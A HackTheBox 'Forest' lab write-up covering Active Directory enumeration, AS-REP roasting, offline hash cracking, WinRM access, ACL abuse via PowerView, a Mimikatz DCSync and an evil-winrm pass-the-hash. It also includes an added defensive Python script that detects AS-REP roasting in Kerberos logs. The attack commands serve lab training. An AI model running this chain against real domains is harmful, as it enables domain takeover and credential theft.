Forest is an easy box on the HackTheBox platform, featuring RID brute forcing, Kerberos AS-REP Roasting, remote access over the WinRM protocol, privilege escalation through Active Directory ACL abuse, and finally a DCSync attack.
Enumeration
We start off with an nmap scan, using the default scripts flag (-sC) and the version detection flag (-sV).
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 08:29 CST
Nmap scan report for 10.10.10.161
Host is up (0.061s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-12 14:36:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2023-12-12T06:36:42-08:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h46m39s, deviation: 4h37m09s, median: 6m37s
| smb2-time:
| date: 2023-12-12T14:36:39
|_ start_date: 2023-12-11T01:44:33
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.32 seconds
From this nmap scan we can see that this machine is an Active Directory Domain Controller. We can attempt to enumerate Domain user accounts if SMB anonymous binds are enabled, so we run enum4linux.
We acquire quite a few users from enum4linux, which we can use to leverage an attack.
Exploitation
We can build a wordlist of Domain usernames to test whether any accounts are AS-REP-Roastable. An AS-REP Roasting attack targets accounts that do not require Kerberos pre-authentication, giving us a hash for the user that we can crack offline.
We can build the text file users.txt like so:
sebastien
lucinda
svc-alfresco
andy
mark
santi
zeus
and utilize it in an AS-REP Roasting attack with impacket-GetNPUsers:
We get a hash for the user svc-alfresco! The svc- naming convention indicates a service account, meaning this account may have been given more privilege than a regular user.
We can then attempt to crack the hash using hashcat with the command: hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
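As an added example (not from the original writeup) of what the AS-REP Roasting step above looks like from the defender's side: the script below flags Windows Security event 4768 records in which a TGT was issued with no pre-authentication, groups them by requesting address so a wordlist sweep stands out, and audits userAccountControl values for the DONT_REQ_PREAUTH bit that makes an account roastable in the first place. All event records, account names, addresses and userAccountControl values are constructed.

```python
"""Defender-side view of AS-REP roasting.  Added example, not part of the original
writeup; all records, names and addresses below are constructed."""
from collections import defaultdict

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit: "Do not require Kerberos preauthentication"


def is_asrep_roast(event: dict) -> bool:
    """A TGT issued (Status 0x0) with PreAuthType 0 means the KDC returned
    password-derived material to a requester who never proved knowledge of the
    password.  RC4 (0x17) is what hashcat mode 18200 cracks, but the signal is
    the missing pre-auth, so the cipher is deliberately not part of the test."""
    return event["PreAuthType"] == "0" and event["Status"] == "0x0"


def roast_report(events: list) -> dict:
    """Map requesting IP -> roasted account names.  One address collecting
    AS-REPs for several accounts is the wordlist sweep described in the writeup."""
    by_source = defaultdict(set)
    for ev in events:
        if ev.get("EventID") == 4768 and is_asrep_roast(ev):
            by_source[ev["IpAddress"]].add(ev["TargetUserName"])
    return dict(by_source)


def preauth_not_required(user_account_control: int) -> bool:
    """Audit side: True when the account carries DONT_REQ_PREAUTH, i.e. it is
    roastable by anyone who merely knows its name."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


# Constructed 4768/4769 records (only the fields the checks need).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "andy", "PreAuthType": "2",           # normal logon
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "mark", "PreAuthType": "2",           # legacy RC4, but pre-authenticated
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.51", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "PreAuthType": "0",   # roasted
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.7", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "zeus", "PreAuthType": "0",           # 0x12 = client revoked, no ticket issued
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.7", "Status": "0x12"},
    {"EventID": 4769, "TargetUserName": "andy", "PreAuthType": "-",           # TGS request, not an AS exchange
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50", "Status": "0x0"},
]

# Constructed userAccountControl values; 0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD.
SAMPLE_UAC = {"andy": 0x10200, "svc-alfresco": 0x10200 | DONT_REQ_PREAUTH}

if __name__ == "__main__":
    print("AS-REP roasting by source:", roast_report(SAMPLE_EVENTS))
    print("Accounts not requiring pre-auth:", [u for u, v in SAMPLE_UAC.items() if preauth_not_required(v)])
```

The fix for any account the audit reports is to clear the "Do not require Kerberos preauthentication" flag and rotate its password, since the old AS-REP material remains crackable.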
Boom! We cracked the service account hash! Now, because the WinRM service is running on port 5985 (which we enumerated earlier with nmap), we could potentially gain command execution if the service user is in the local group “Remote Management Users”.
We get command execution!
Privilege Escalation
As a Domain user or a service account, I like to run BloodHound against the target to enumerate potential domain vulnerabilities such as Kerberoasting or permission misconfigurations.
We find that the Domain Group Account Operators has GenericAll access on zeus, that svc-alfresco is a member of the Privileged Accounts Domain Group, and that the Privileged Accounts Domain Group is in turn a member of the Account Operators Group. Because of this, our current user has full control over the user zeus. We can change their password, add them to the Remote Management Users group to get remote command execution, then give them DCSync rights.
net localgroup "Remote Management Users" htb.local\zeus /add
Utilize PowerView to give zeus DCSync rights:
. .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\zeus', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity htb.local -PrincipalIdentity zeus -Rights DCSync
Then we can use Evil-WinRM once more to gain access to the zeus account.
We can then use Mimikatz to perform the DCSync procedure as zeus.
Mimikatz.exe "lsadump::dcsync /domain:htb.local /user:Administrator" "exit"
Now that we've gathered the NTLM hash of the Administrator, we can use it to Pass the Hash (PtH) as the Domain Administrator with evil-winrm.
evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6